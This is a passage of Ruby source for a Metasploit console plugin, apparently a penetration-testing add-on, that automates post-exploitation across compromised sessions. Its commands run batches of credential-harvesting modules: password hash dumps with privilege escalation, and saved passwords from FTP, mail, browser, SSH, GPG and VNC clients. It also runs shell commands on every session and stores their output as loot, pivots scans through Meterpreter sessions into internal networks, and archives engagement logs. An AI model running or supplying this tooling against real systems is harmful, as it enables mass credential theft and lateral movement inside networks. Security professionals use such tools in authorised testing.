# Copyright (c) 2017, Carlos Perez "Run a post module against specified sessions.", 'multi_post_rc' => "Run resource file with post modules and options against specified sessions.", 'multi_meter_cmd' => "Run a Meterpreter Console Command against specified sessions.", 'multi_meter_cmd_rc'=> "Run resource file with Meterpreter Console Commands against specified sessions.", "multi_cmd" => "Run shell command against several sessions", "sys_creds" => "Run system password collection modules against specified sessions.", "app_creds" => "Run application password collection modules against specified sessions.", "get_lhost" => "List local IP addresses that can be used for LHOST." } end def cmd_get_lhost(*args) opts = Rex::Parser::Arguments.new( "-h" => [ false, "Command help."] ) opts.parse(args) do |opt, idx, val| case opt when "-h" print_line("Command for listing local IP Addresses that can be used with LHOST.") print_line(opts.usage) return else print_line(opts.usage) return end end print_status("Local host IP addresses:") Socket.ip_address_list.each do |a| if !(a.ipv4_loopback?()|a.ipv6_linklocal?()|a.ipv6_loopback?()) print_good("\t#{a.ip_address}") end end print_line end # Multi shell command def cmd_multi_cmd(*args) # Define options opts = Rex::Parser::Arguments.new( "-s" => [ true, "Comma separated list sessions to run modules against."], "-c" => [ true, "Shell command to run."], "-p" => [ true, "Platform to run the command against. If none given it will run against all."], "-h" => [ false, "Command Help."] ) # set variables for options sessions = [] command = "" plat = "" # Parse options opts.parse(args) do |opt, idx, val| case opt when "-s" if val =~ /all/i sessions = framework.sessions.keys else sessions = val.split(",") end when "-c" command = val when "-p" plat = val when "-h" print_line(opts.usage) return else print_line(opts.usage) return end end # Make sure that proper values where provided if not sessions.empty? and not command.empty? # Iterate thru the session IDs sessions.each do |s| # Set the session object session = framework.sessions[s.to_i] if session.platform =~ /#{plat}/i || plat.empty? host = session.tunnel_peer.split(":")[0] print_line("Running #{command} against session #{s}") # Run the command cmd_out = session.shell_command_token(command) # Print good each line of the command output if not cmd_out.nil? cmd_out.each_line do |l| print_line(l.chomp) end file_name = "#{File.join(Msf::Config.loot_directory,"#{Time.now.strftime("%Y%m%d%H%M%S")}_command.txt")}" framework.db.report_loot({ :host=> host, :path => file_name, :ctype => "text/plain", :ltype => "host.command.shell", :data => cmd_out, :name => "#{host}.txt", :info => "Output of command #{command}" }) else print_error("No output or error when running the command.") end end end else print_error("You must specify both a session and a command.") print_line(opts.usage) return end end # browser_creds Command #------------------------------------------------------------------------------------------- def cmd_app_creds(*args) opts = Rex::Parser::Arguments.new( "-s" => [ true, "Sessions to run modules against. Example or <1,2,3,4>"], "-h" => [ false, "Command Help"] ) cred_mods = [ {"mod" => "windows/gather/credentials/wsftp_client", "opt" => nil}, {"mod" => "windows/gather/credentials/winscp", "opt" => nil}, {"mod" => "windows/gather/credentials/windows_autologin", "opt" => nil}, {"mod" => "windows/gather/credentials/vnc", "opt" => nil}, {"mod" => "windows/gather/credentials/trillian", "opt" => nil}, {"mod" => "windows/gather/credentials/total_commander", "opt" => nil}, {"mod" => "windows/gather/credentials/smartftp", "opt" => nil}, {"mod" => "windows/gather/credentials/outlook", "opt" => nil}, {"mod" => "windows/gather/credentials/nimbuzz", "opt" => nil}, {"mod" => "windows/gather/credentials/mremote", "opt" => nil}, {"mod" => "windows/gather/credentials/imail", "opt" => nil}, {"mod" => "windows/gather/credentials/idm", "opt" => nil}, {"mod" => "windows/gather/credentials/flashfxp", "opt" => nil}, {"mod" => "windows/gather/credentials/filezilla_server", "opt" => nil}, {"mod" => "windows/gather/credentials/meebo", "opt" => nil}, {"mod" => "windows/gather/credentials/razorsql", "opt" => nil}, {"mod" => "windows/gather/credentials/coreftp", "opt" => nil}, {"mod" => "windows/gather/credentials/imvu", "opt" => nil}, {"mod" => "windows/gather/credentials/epo_sql", "opt" => nil}, {"mod" => "windows/gather/credentials/gpp", "opt" => nil}, {"mod" => "windows/gather/credentials/enum_picasa_pwds", "opt" => nil}, {"mod" => "windows/gather/credentials/tortoisesvn", "opt" => nil}, {"mod" => "windows/gather/credentials/ftpnavigator", "opt" => nil}, {"mod" => "windows/gather/credentials/dyndns", "opt" => nil}, {"mod" => "windows/gather/credentials/bulletproof_ftp", "opt" => nil}, {"mod" => "windows/gather/credentials/enum_cred_store", "opt" => nil}, {"mod" => "windows/gather/credentials/ftpx", "opt" => nil}, {"mod" => "windows/gather/credentials/razer_synapse", "opt" => nil}, {"mod" => "windows/gather/credentials/sso", "opt" => nil}, {"mod" => "windows/gather/credentials/steam", "opt" => nil}, {"mod" => "windows/gather/enum_ie", "opt" => nil}, {"mod" => "multi/gather/ssh_creds", "opt" => nil}, {"mod" => "multi/gather/pidgin_cred", "opt" => nil}, {"mod" => "multi/gather/firefox_creds", "opt" => nil}, {"mod" => "multi/gather/filezilla_client_cred", "opt" => nil}, {"mod" => "multi/gather/fetchmailrc_creds", "opt" => nil}, {"mod" => "multi/gather/thunderbird_creds", "opt" => nil}, {"mod" => "multi/gather/netrc_creds", "opt" => nil}, {"mod" => "/multi/gather/gpg_creds", "opt" => nil} ] # Parse options if args.length == 0 print_line(opts.usage) return end sessions = "" opts.parse(args) do |opt, idx, val| case opt when "-s" sessions = val when "-h" print_line(opts.usage) return else print_line(opts.usage) return end end if not sessions.empty? cred_mods.each do |p| m = framework.post.create(p["mod"]) next if m == nil # Set Sessions to be processed if sessions =~ /all/i session_list = m.compatible_sessions else session_list = sessions.split(",") end session_list.each do |s| begin if m.session_compatible?(s.to_i) m.datastore['SESSION'] = s.to_i if p['opt'] opt_pair = p['opt'].split("=",2) m.datastore[opt_pair[0]] = opt_pair[1] end m.options.validate(m.datastore) print_line("") print_line("Running #{p['mod']} against #{s}") m.run_simple( 'LocalInput' => driver.input, 'LocalOutput' => driver.output ) end rescue print_error("Could not run post module against sessions #{s}.") end end end else print_line(opts.usage) return end end # sys_creds Command #------------------------------------------------------------------------------------------- def cmd_sys_creds(*args) opts = Rex::Parser::Arguments.new( "-s" => [ true, "Sessions to run modules against. Example or <1,2,3,4>"], "-h" => [ false, "Command Help"] ) cred_mods = [ {"mod" => "windows/gather/cachedump", "opt" => nil}, {"mod" => "windows/gather/smart_hashdump", "opt" => "GETSYSTEM=true"}, {"mod" => "windows/gather/credentials/gpp", "opt" => nil}, {"mod" => "osx/gather/hashdump", "opt" => nil}, {"mod" => "linux/gather/hashdump", "opt" => nil}, {"mod" => "solaris/gather/hashdump", "opt" => nil}, ] # Parse options sessions = "" opts.parse(args) do |opt, idx, val| case opt when "-s" sessions = val when "-h" print_line(opts.usage) return else print_line(opts.usage) return end end if not sessions.empty? cred_mods.each do |p| m = framework.post.create(p["mod"]) # Set Sessions to be processed if sessions =~ /all/i session_list = m.compatible_sessions else session_list = sessions.split(",") end session_list.each do |s| if m.session_compatible?(s.to_i) m.datastore['SESSION'] = s.to_i if p['opt'] opt_pair = p['opt'].split("=",2) m.datastore[opt_pair[0]] = opt_pair[1] end m.options.validate(m.datastore) print_line("") print_line("Running #{p['mod']} against #{s}") m.run_simple( 'LocalInput' => driver.input, 'LocalOutput' => driver.output ) end end end else print_line(opts.usage) return end end # Multi_post Command #------------------------------------------------------------------------------------------- # Function for doing auto complete on module name def tab_complete_module(str, words) res = [] framework.modules.module_types.each do |mtyp| mset = framework.modules.module_names(mtyp) mset.each do |mref| res << mtyp + '/' + mref end end return res.sort end # Function to do tab complete on modules for multi_post def cmd_multi_post_tabs(str, words) tab_complete_module(str, words) end # Function for the multi_post command def cmd_multi_post(*args) opts = Rex::Parser::Arguments.new( "-s" => [ true, "Sessions to run module against. Example or <1,2,3,4>"], "-m" => [ true, "Module to run against sessions."], "-o" => [ true, "Module options."], "-h" => [ false, "Command Help."] ) post_mod = "" mod_opts = nil sessions = "" # Parse options opts.parse(args) do |opt, idx, val| case opt when "-s" sessions = val when "-m" post_mod = val.gsub(/^post\//,"") when "-o" mod_opts = val when "-h" print_line opts.usage return else print_status "Please specify a module to run with the -m option." return end end # Make sure that proper values where provided if not sessions.empty? and not post_mod.empty? # Set and execute post module with options print_line("Loading #{post_mod}") m = framework.post.create(post_mod) if sessions =~ /all/i session_list = m.compatible_sessions else session_list = sessions.split(",") end if session_list session_list.each do |s| if m.session_compatible?(s.to_i) print_line("Running against #{s}") m.datastore['SESSION'] = s.to_i if mod_opts mod_opts.each do |o| opt_pair = o.split("=",2) print_line("\tSetting Option #{opt_pair[0]} to #{opt_pair[1]}") m.datastore[opt_pair[0]] = opt_pair[1] end end m.options.validate(m.datastore) m.run_simple( 'LocalInput' => driver.input, 'LocalOutput' => driver.output ) else print_error("Session #{s} is not compatible with #{post_mod}.") end end else print_error("No compatible sessions were found.") end else print_error("A session or Post Module where not specified.") print_line(opts.usage) return end end # Multi_post_rc Command #------------------------------------------------------------------------------------------- def cmd_multi_post_rc_tabs(str, words) tab_complete_filenames(str, words) end def cmd_multi_post_rc(*args) opts = Rex::Parser::Arguments.new( "-rc" => [ true, "Resource file with space separate values , per line."], "-h" => [ false, "Command Help."] ) post_mod = nil session_list = nil mod_opts = nil entries = [] opts.parse(args) do |opt, idx, val| case opt when "-rc" script = val if not ::File.exists?(script) print_error "Resource File does not exists!" return else ::File.open(script, "r").each_line do |line| # Empty line next if line.strip.length < 1 # Comment next if line[0,1] == "#" entries << line.chomp end end when "-h" print_line opts.usage return else print_line opts.usage return end end if entries entries.each do |l| values = l.split sessions = values[0] post_mod = values[1] if values.length == 3 mod_opts = values[2].split(",") end print_line("Loading #{post_mod}") m= framework.post.create(post_mod.gsub(/^post\//,"")) if sessions =~ /all/i session_list = m.compatible_sessions else session_list = sessions.split(",") end session_list.each do |s| if m.session_compatible?(s.to_i) print_line("Running Against #{s}") m.datastore['SESSION'] = s.to_i if mod_opts mod_opts.each do |o| opt_pair = o.split("=",2) print_line("\tSetting Option #{opt_pair[0]} to #{opt_pair[1]}") m.datastore[opt_pair[0]] = opt_pair[1] end end m.options.validate(m.datastore) m.run_simple( 'LocalInput' => driver.input, 'LocalOutput' => driver.output ) else print_error("Session #{s} is not compatible with #{post_mod}") end end end else print_error("Resource file was empty!") end end # Multi_meter_cmd Command #------------------------------------------------------------------------------------------- def cmd_multi_meter_cmd(*args) opts = Rex::Parser::Arguments.new( "-s" => [ true, "Sessions to run Meterpreter Console Command against. Example or <1,2,3,4>"], "-c" => [ true, "Meterpreter Console Command to run against sessions."], "-h" => [ false, "Command Help."] ) command = nil session = nil # Parse options opts.parse(args) do |opt, idx, val| case opt when "-s" session = val when "-c" command = val when "-h" print_line opts.usage return else print_status "Please specify a command to run with the -m option." return end end current_sessions = framework.sessions.keys.sort if session =~/all/i sessions = current_sessions else sessions = session.split(",") end sessions.each do |s| # Check if session is in the current session list. next if not current_sessions.include?(s.to_i) # Get session object session = framework.sessions.get(s.to_i) # Check if session is meterpreter and run command. if (session.type == "meterpreter") print_line("Running command #{command} against session #{s}") session.console.run_single(command) else print_line("Session #{s} is not a Meterpreter session!") end end end # Multi_post_rc Command #------------------------------------------------------------------------------------------- def cmd_multi_meter_cmd_rc(*args) opts = Rex::Parser::Arguments.new( "-rc" => [ true, "Resource file with space separate values , per line."], "-h" => [ false, "Command Help"] ) entries = [] script = nil opts.parse(args) do |opt, idx, val| case opt when "-rc" script = val if not ::File.exists?(script) print_error "Resource File does not exists" return else ::File.open(script, "r").each_line do |line| # Empty line next if line.strip.length < 1 # Comment next if line[0,1] == "#" entries << line.chomp end end when "-h" print_line opts.usage return else print_line opts.usage return end end entries.each do |entrie| session_parm,command = entrie.split(" ", 2) current_sessions = framework.sessions.keys.sort if session_parm =~ /all/i sessions = current_sessions else sessions = session_parm.split(",") end sessions.each do |s| # Check if session is in the current session list. next if not current_sessions.include?(s.to_i) # Get session object session = framework.sessions.get(s.to_i) # Check if session is meterpreter and run command. if (session.type == "meterpreter") print_line("Running command #{command} against session #{s}") session.console.run_single(command) else print_line("Session #{s} is not a Meterpreter sessions.") end end end end end # Project handling commands ################################################################################################ class ProjectCommandDispatcher include Msf::Ui::Console::CommandDispatcher # Set name for command dispatcher def name "Project" end # Define Commands def commands { "project" => "Command for managing projects.", } end def cmd_project(*args) # variable project_name = "" create = false delete = false history = false switch = false archive = false arch_path = ::File.join(Msf::Config.log_directory,"archives") # Define options opts = Rex::Parser::Arguments.new( "-c" => [ false, "Create a new Metasploit project and sets logging for it."], "-d" => [ false, "Delete a project created by the plugin."], "-s" => [ false, "Switch to a project created by the plugin."], "-a" => [ false, "Export all history and DB and archive it in to a zip file for current project."], "-p" => [ true, "Path to save archive, if none provide default ~/.msf4/archives will be used."], "-r" => [ false, "Create time stamped RC files of Meterpreter Sessions and console history for current project."], "-ph" => [ false, "Generate resource files for sessions and console. Generate time stamped session logs for current project."], "-l" => [ false, "List projects created by plugin."], "-h" => [ false, "Command Help"] ) opts.parse(args) do |opt, idx, val| case opt when "-p" if ::File.directory?(val) arch_path = val else print_error("Path provided for archive does not exists!") return end when "-d" delete = true when "-s" switch = true when "-a" archive = true when "-c" create = true when "-r" make_console_rc make_sessions_rc when "-h" print_line(opts.usage) return when "-l" list return when "-ph" history = true else project_name = val.gsub(" ","_").chomp end end if project_name and create project_create(project_name) elsif project_name and delete project_delete(project_name) elsif project_name and switch project_switch(project_name) elsif archive project_archive(arch_path) elsif history project_history else list end end def project_delete(project_name) # Check if project exists if project_list.include?(project_name) current_workspace = framework.db.workspace.name if current_workspace == project_name driver.init_ui(driver.input, Rex::Ui::Text::Output::Stdio.new) end workspace = framework.db.find_workspace(project_name) if workspace.default? workspace.destroy workspace = framework.db.add_workspace(project_name) print_line("Deleted and recreated the default workspace") else # switch to the default workspace if we're about to delete the current one framework.db.workspace = framework.db.default_workspace if framework.db.workspace.name == workspace.name # now destroy the named workspace workspace.destroy print_line("Deleted workspace: #{project_name}") end project_path = ::File.join(Msf::Config.log_directory,"projects",project_name) ::FileUtils.rm_rf(project_path) print_line("Project folder #{project_path} has been deleted") else print_error("Project was not found on list of projects!") end return true end # Switch to another project created by the plugin def project_switch(project_name) # Check if project exists if project_list.include?(project_name) print_line("Switching to #{project_name}") # Disable spooling for current driver.init_ui(driver.input, Rex::Ui::Text::Output::Stdio.new) # Switch workspace workspace = framework.db.find_workspace(project_name) framework.db.workspace = workspace print_line("Workspace: #{workspace.name}") # Spool spool_path = ::File.join(Msf::Config.log_directory,"projects",framework.db.workspace.name) spool_file = ::File.join(spool_path,"#{project_name}_spool.log") # Start spooling for new workspace driver.init_ui(driver.input, Rex::Ui::Text::Output::Tee.new(spool_file)) print_line("Spooling to file #{spool_file}...") print_line("Successfully migrated to #{project_name}") else print_error("Project was not found on list of projects!") end return true end # List current projects created by the plugin def list current_workspace = framework.db.workspace.name print_line("List of projects:") project_list.each do |p| if current_workspace == p print_line("\t* #{p}") else print_line("\t#{p}") end end return true end # Archive project in to a zip file def project_archive(archive_path) # Set variables for options project_name = framework.db.workspace.name project_path = ::File.join(Msf::Config.log_directory,"projects",project_name) archive_name = "#{project_name}_#{::Time.now.strftime("%Y%m%d.%M%S")}.zip" db_export_name = "#{project_name}_#{::Time.now.strftime("%Y%m%d.%M%S")}.xml" db_out = ::File.join(project_path,db_export_name) format = "xml" print_line("Exporting DB Workspace #{project_name}") exporter = Msf::DBManager::Export.new(framework.db.workspace) exporter.send("to_#{format}_file".intern,db_out) do |mtype, mstatus, mname| if mtype == :status if mstatus == "start" print_line(" >> Starting export of #{mname}") end if mstatus == "complete" print_line(" >> Finished export of #{mname}") end end end print_line("Finished export of workspace #{framework.db.workspace.name} to #{db_out} [ #{format} ]...") print_line("Disabling spooling for #{project_name}") driver.init_ui(driver.input, Rex::Ui::Text::Output::Stdio.new) print_line("Spooling disabled for archiving") archive_full_path = ::File.join(archive_path,archive_name) make_console_rc make_sessions_rc make_sessions_logs compress(project_path,archive_full_path) print_line("MD5 for archive is #{digestmd5(archive_full_path)}") # Spool spool_path = ::File.join(Msf::Config.log_directory,"projects",framework.db.workspace.name) spool_file = ::File.join(spool_path,"#{project_name}_spool.log") print_line("Spooling re-enabled") # Start spooling for new workspace driver.init_ui(driver.input, Rex::Ui::Text::Output::Tee.new(spool_file)) print_line("Spooling to file #{spool_file}...") return true end # Export Command History for Sessions and Console #------------------------------------------------------------------------------------------- def project_history make_console_rc make_sessions_rc make_sessions_logs return true end # Create a new project Workspace and enable logging #------------------------------------------------------------------------------------------- def project_create(project_name) # Make sure that proper values where provided spool_path = ::File.join(Msf::Config.log_directory,"projects",project_name) ::FileUtils.mkdir_p(spool_path) spool_file = ::File.join(spool_path,"#{project_name}_spool.log") if framework.db and framework.db.active print_line("Creating DB Workspace named #{project_name}") workspace = framework.db.add_workspace(project_name) framework.db.workspace = workspace print_line("Added workspace: #{workspace.name}") driver.init_ui(driver.input, Rex::Ui::Text::Output::Tee.new(spool_file)) print_line("Spooling to file #{spool_file}...") else print_error("A database most be configured and connected to create a project") end return true end # Method for creating a console resource file from all commands entered in the console #------------------------------------------------------------------------------------------- def make_console_rc # Set RC file path and file name rc_file = "#{framework.db.workspace.name}_#{::Time.now.strftime("%Y%m%d.%M%S")}.rc" consonle_rc_path = ::File.join(Msf::Config.log_directory,"projects",framework.db.workspace.name) rc_full_path = ::File.join(consonle_rc_path,rc_file) # Create folder ::FileUtils.mkdir_p(consonle_rc_path) con_rc = "" framework.db.workspace.events.each do |e| if not e.info.nil? and e.info.has_key?(:command) and not e.info.has_key?(:session_type) con_rc << "# command executed at #{e.created_at}\n" con_rc << "#{e.info[:command]}\n" end end # Write RC console file print_line("Writing Console RC file to #{rc_full_path}") file_write(rc_full_path, con_rc) print_line("RC file written") return rc_full_path end # Method for creating individual rc files per session using the session uuid #------------------------------------------------------------------------------------------- def make_sessions_rc sessions_uuids = [] sessions_info = [] info = "" rc_file = "" rc_file_name = "" rc_list =[] framework.db.workspace.events.each do |e| if not e.info.nil? and e.info.has_key?(:command) and e.info[:session_type] =~ /meter/ if e.info[:command] != "load stdapi" if not sessions_uuids.include?(e.info[:session_uuid]) sessions_uuids << e.info[:session_uuid] sessions_info << {:uuid => e.info[:session_uuid], :type => e.info[:session_type], :id => e.info[:session_id], :info => e.info[:session_info]} end end end end sessions_uuids.each do |su| sessions_info.each do |i| if su == i[:uuid] print_line("Creating RC file for Session #{i[:id]}") rc_file_name = "#{framework.db.workspace.name}_session_#{i[:id]}_#{::Time.now.strftime("%Y%m%d.%M%S")}.rc" i.each do |k,v| info << "#{k.to_s}: #{v.to_s} " end break end end rc_file << "# Info: #{info}\n" info = "" framework.db.workspace.events.each do |e| if not e.info.nil? and e.info.has_key?(:command) and e.info.has_key?(:session_uuid) if e.info[:session_uuid] == su rc_file << "# command executed at #{e.created_at}\n" rc_file << "#{e.info[:command]}\n" end end end # Set RC file path and file name consonle_rc_path = ::File.join(Msf::Config.log_directory,"projects",framework.db.workspace.name) rc_full_path = ::File.join(consonle_rc_path,rc_file_name) print_line("Saving RC file to #{rc_full_path}") file_write(rc_full_path, rc_file) rc_file = "" print_line("RC file written") rc_list << rc_full_path end return rc_list end # Method for exporting session history with output #------------------------------------------------------------------------------------------- def make_sessions_logs sessions_uuids = [] sessions_info = [] info = "" hist_file = "" hist_file_name = "" log_list = [] # Create list of sessions with base info framework.db.workspace.events.each do |e| if not e.info.nil? and e.info[:session_type] =~ /shell/ or e.info[:session_type] =~ /meter/ if e.info[:command] != "load stdapi" if not sessions_uuids.include?(e.info[:session_uuid]) sessions_uuids << e.info[:session_uuid] sessions_info << {:uuid => e.info[:session_uuid], :type => e.info[:session_type], :id => e.info[:session_id], :info => e.info[:session_info]} end end end end sessions_uuids.each do |su| sessions_info.each do |i| if su == i[:uuid] print_line("Exporting Session #{i[:id]} history") hist_file_name = "#{framework.db.workspace.name}_session_#{i[:id]}_#{::Time.now.strftime("%Y%m%d.%M%S")}.log" i.each do |k,v| info << "#{k.to_s}: #{v.to_s} " end break end end hist_file << "# Info: #{info}\n" info = "" framework.db.workspace.events.each do |e| if not e.info.nil? and e.info.has_key?(:command) or e.info.has_key?(:output) if e.info[:session_uuid] == su if e.info.has_key?(:command) hist_file << "#{e.updated_at}\n" hist_file << "#{e.info[:command]}\n" elsif e.info.has_key?(:output) hist_file << "#{e.updated_at}\n" hist_file << "#{e.info[:output]}\n" end end end end # Set RC file path and file name session_hist_path = ::File.join(Msf::Config.log_directory,"projects",framework.db.workspace.name) session_hist_fullpath = ::File.join(session_hist_path,hist_file_name) # Create folder ::FileUtils.mkdir_p(session_hist_path) print_line("Saving log file to #{session_hist_fullpath}") file_write(session_hist_fullpath, hist_file) hist_file = "" print_line("Log file written") log_list << session_hist_fullpath end return log_list end # Compress a given folder given it's path #------------------------------------------------------------------------------------------- def compress(path,archive) require 'zip/zip' require 'zip/zipfilesystem' path.sub!(%r[/$],'') ::Zip::ZipFile.open(archive, 'w') do |zipfile| Dir["#{path}/**/**"].reject{|f|f==archive}.each do |file| print_line("Adding #{file} to archive") zipfile.add(file.sub(path+'/',''),file) end end print_line("All files saved to #{archive}") end # Method to write string to file def file_write(file2wrt, data2wrt) if not ::File.exists?(file2wrt) ::FileUtils.touch(file2wrt) end output = ::File.open(file2wrt, "a") data2wrt.each_line do |d| output.puts(d) end output.close end # Method to create MD5 of given file def digestmd5(file2md5) if not ::File.exists?(file2md5) raise "File #{file2md5} does not exists!" else require 'digest/md5' chksum = nil chksum = Digest::MD5.hexdigest(::File.open(file2md5, "rb") { |f| f.read}) return chksum end end # Method that returns a hash of projects def project_list project_folders = Dir::entries(::File.join(Msf::Config.log_directory,"projects")) projects = [] framework.db.workspaces.each do |s| if project_folders.include?(s.name) projects << s.name end end return projects end end # Discovery handling commands ################################################################################################ class DiscoveryCommandDispatcher include Msf::Ui::Console::CommandDispatcher # Set name for command dispatcher def name "Discovery" end # Define Commands def commands { "network_discover" => "Performs a port-scan and enumeration of services found for non pivot networks.", "discover_db" => "Run discovery modules against current hosts in the database.", "show_session_networks" => "Enumerate the networks one could pivot thru Meterpreter in the active sessions.", "pivot_network_discover" => "Performs enumeration of networks available to a specified Meterpreter session." } end def cmd_discover_db(*args) # Variables range = [] filter = [] smb_user = nil smb_pass = nil smb_dom = "WORKGROUP" maxjobs = 30 verbose = false # Define options opts = Rex::Parser::Arguments.new( "-r" => [ true, "Provide a IPRange or CIDR to run discovery module against."], "-U" => [ true, "SMB User-name for discovery(optional)."], "-P" => [ true, "SMB Password for discovery(optional)."], "-D" => [ true, "SMB Domain for discovery(optional)."], "-j" => [ true, "Max number of concurrent jobs. Default is 30"], "-v" => [ false, "Be Verbose when running jobs."], "-h" => [ false, "Help Message."] ) opts.parse(args) do |opt, idx, val| case opt when "-r" range = val when "-U" smb_user = val when "-P" smb_pass = val when "-D" smb_dom = val when "-j" maxjobs = val.to_i when "-v" verbose = true when "-h" print_line opts.usage return end end # generate a list of IPs to filter Rex::Socket::RangeWalker.new(range).each do |i| filter << i end #after_hosts = framework.db.workspace.hosts.find_all_by_state("alive") framework.db.workspace.hosts.each do |h| if filter.empty? run_smb(h.services.where(state: "open"),smb_user,smb_pass,smb_dom,maxjobs, verbose) run_version_scans(h.services.where(state: "open"),maxjobs, verbose) else if filter.include?(h.address) # Run the discovery modules for the services of each host run_smb(h.services,smb_user,smb_pass,smb_dom,maxjobs, verbose) run_version_scans(h.services,maxjobs, verbose) end end end end def cmd_show_session_networks(*args) #option variables session_list = nil opts = Rex::Parser::Arguments.new( "-s" => [ true, "Sessions to enumerate networks against. Example or <1,2,3,4>."], "-h" => [ false, "Help Message."] ) opts.parse(args) do |opt, idx, val| case opt when "-s" if val =~ /all/i session_list = framework.sessions.keys else session_list = val.split(",") end when "-h" print_line("This command will show the networks that can be routed thru a Meterpreter session.") print_line(opts.usage) return else print_line("This command will show the networks that can be routed thru a Meterpreter session.") print_line(opts.usage) return end end tbl = ::Rex::Text::Table.new( 'Columns' => [ 'Network', 'Netmask', 'Session' ]) # Go thru each sessions specified if !session_list.nil? session_list.each do |si| # check that session actually exists if framework.sessions.keys.include?(si.to_i) # Get session object session = framework.sessions.get(si.to_i) # Check that it is a Meterpreter session if (session.type == "meterpreter") session.net.config.each_route do |route| # Remove multicast and loopback interfaces next if route.subnet =~ /^(224\.|127\.)/ next if route.subnet == '' next if route.netmask == '' tbl << [route.subnet, route.netmask, si] end end end end else print_error("No Sessions specified.") return end print_line(tbl.to_s) end def cmd_pivot_network_discover(*args) #option variables session_id = nil port_scan = false udp_scan = false disc_mods = false smb_user = nil smb_pass = nil smb_dom = "WORKGROUP" verbose = false port_lists = [] opts = Rex::Parser::Arguments.new( "-s" => [ true, "Session to do discovery of networks and hosts."], "-t" => [ false, "Perform TCP port scan of hosts discovered."], "-u" => [ false, "Perform UDP scan of hosts discovered."], "-p" => [ true, "Port list. Provide a comma separated list of port and/or ranges to TCP scan."], "-d" => [ false, "Run Framework discovery modules against found hosts."], "-U" => [ true, "SMB User-name for discovery(optional)."], "-P" => [ true, "SMB Password for discovery(optional)."], "-D" => [ true, "SMB Domain for discovery(optional)."], "-v" => [ false, "Be verbose and show pending actions."], "-h" => [ false, "Help Message."] ) opts.parse(args) do |opt, idx, val| case opt when "-s" session_id = val.to_i when "-t" port_scan = true when "-u" udp_scan = true when "-d" disc_mods = true when "-U" smb_user = val when "-P" smb_pass = val when "-D" smb_dom = val when "-v" verbose = true when "-p" port_lists = port_lists + Rex::Socket.portspec_crack(val) when "-h" print_line(opts.usage) return else print_line(opts.usage) return end end if session_id.nil? print_error("You need to specify a Session to do discovery against.") print_line(opts.usage) return end # Static UDP port list udp_ports = [53,67,137,161,123,138,139,1434,5093,523,1604] # Variable to hold the array of networks that we will discover networks = [] # Switchboard instace for routing sb = Rex::Socket::SwitchBoard.instance if framework.sessions.keys.include?(session_id.to_i) # Get session object session = framework.sessions.get(session_id.to_i) if (session.type == "meterpreter") # Collect addresses to help determine the best method for discovery int_addrs = [] session.net.config.interfaces.each do |i| int_addrs = int_addrs + i.addrs end print_status("Identifying networks to discover") session.net.config.each_route { |route| # Remove multicast and loopback interfaces next if route.subnet =~ /^(224\.|127\.)/ next if route.subnet == '' next if route.netmask == '' # Save the network in to CIDR format networks << "#{route.subnet}/#{Rex::Socket.addr_atoc(route.netmask)}" if port_scan || udp_scan if not sb.route_exists?(route.subnet, route.netmask) print_status("Routing new subnet #{route.subnet}/#{route.netmask} through session #{session.sid}") sb.add_route(route.subnet, route.netmask, session) end end } # Run ARP Scan and Ping Sweep for each of the networks networks.each do |n| opt = {"RHOSTS" => n} # Check if any of the networks is directly connected. If so use ARP Scanner net_ips = [] Rex::Socket::RangeWalker.new(n).each {|i| net_ips << i} if int_addrs.any? {|ip| net_ips.include?(ip) } run_post(session_id, "windows/gather/arp_scanner", opt) else run_post(session_id, "multi/gather/ping_sweep", opt) end end # See what hosts where discovered via the ping scan and ARP Scan hosts_on_db = framework.db.workspace.hosts.map { |h| h.address} if port_scan if port_lists.length > 0 ports = port_lists else # Generate port list that are supported by modules in Metasploit ports = get_tcp_port_list end end networks.each do |n| print_status("Discovering #{n} Network") net_hosts = [] Rex::Socket::RangeWalker.new(n).each {|i| net_hosts << i} found_ips = hosts_on_db & net_hosts # run portscan against hosts in this network if port_scan found_ips.each do |t| print_good("Running TCP Portscan against #{t}") run_aux_module("scanner/portscan/tcp", {"RHOSTS" => t, "PORTS"=> (ports * ","), "THREADS" => 5, "CONCURRENCY" => 50, "ConnectTimeout" => 1}) jobwaiting(10,false, "scanner") end end # if a udp port scan was selected lets execute it if udp_scan found_ips.each do |t| print_good("Running UDP Portscan against #{t}") run_aux_module("scanner/discovery/udp_probe", {"RHOSTS" => t, "PORTS"=> (udp_ports * ","), "THREADS" => 5}) jobwaiting(10,false,"scanner") end end # Wait for the scanners to finish before running the discovery modules if port_scan || udp_scan print_status("Waiting for scans to finish") finish_scanning = false while not finish_scanning ::IO.select(nil, nil, nil, 2.5) count = get_job_count if verbose print_status("\t#{count} scans pending") end if count == 0 finish_scanning = true end end end # Run discovery modules against the services that are for the hosts in the database if disc_mods found_ips.each do |t| host = framework.db.find_or_create_host(:host => t) found_services = host.services.where(state: "open") if found_services.length > 0 print_good("Running SMB discovery against #{t}") run_smb(found_services,smb_user,smb_pass,smb_dom,10,true) print_good("Running service discovery against #{t}") run_version_scans(found_services,10,true) else print_status("No new services where found to enumerate.") end end end end end else print_error("The Session specified does not exist") end end # Network Discovery command def cmd_network_discover(*args) # Variables scan_type = "-A" range = "" disc_mods = false smb_user = nil smb_pass = nil smb_dom = "WORKGROUP" maxjobs = 30 verbose = false port_lists = [] # Define options opts = Rex::Parser::Arguments.new( "-r" => [ true, "IP Range to scan in CIDR format."], "-d" => [ false, "Run Framework discovery modules against found hosts."], "-u" => [ false, "Perform UDP Scanning. NOTE: Must be ran as root."], "-U" => [ true, "SMB User-name for discovery(optional)."], "-P" => [ true, "SMB Password for discovery(optional)."], "-D" => [ true, "SMB Domain for discovery(optional)."], "-j" => [ true, "Max number of concurrent jobs. Default is 30"], "-p" => [ true, "Port list. Provide a comma separated list of port and/or ranges to TCP scan."], "-v" => [ false, "Be Verbose when running jobs."], "-h" => [ true, "Help Message."] ) if args.length == 0 print_line opts.usage return end opts.parse(args) do |opt, idx, val| case opt when "-r" # Make sure no spaces are in the range definition range = val.gsub(" ","") when "-d" disc_mods = true when "-u" scan_type = "-sU" when "-U" smb_user = val when "-P" smb_pass = val when "-D" smb_dom = val when "-j" maxjobs = val.to_i when "-v" verbose = true when "-p" port_lists = port_lists + Rex::Socket.portspec_crack(val) when "-h" print_line opts.usage return end end # Static UDP port list udp_ports = [53,67,137,161,123,138,139,1434,5093,523,1604] # Check that the ragne is a valid one ip_list = Rex::Socket::RangeWalker.new(range) ips_given = [] if ip_list.length == 0 print_error("The IP Range provided appears to not be valid.") else ip_list.each do |i| ips_given << i end end # Get the list of IP's that are routed thru a Pivot route_ips = get_routed_ips if port_lists.length > 0 ports = port_lists else # Generate port list that are supported by modules in Metasploit ports = get_tcp_port_list end if 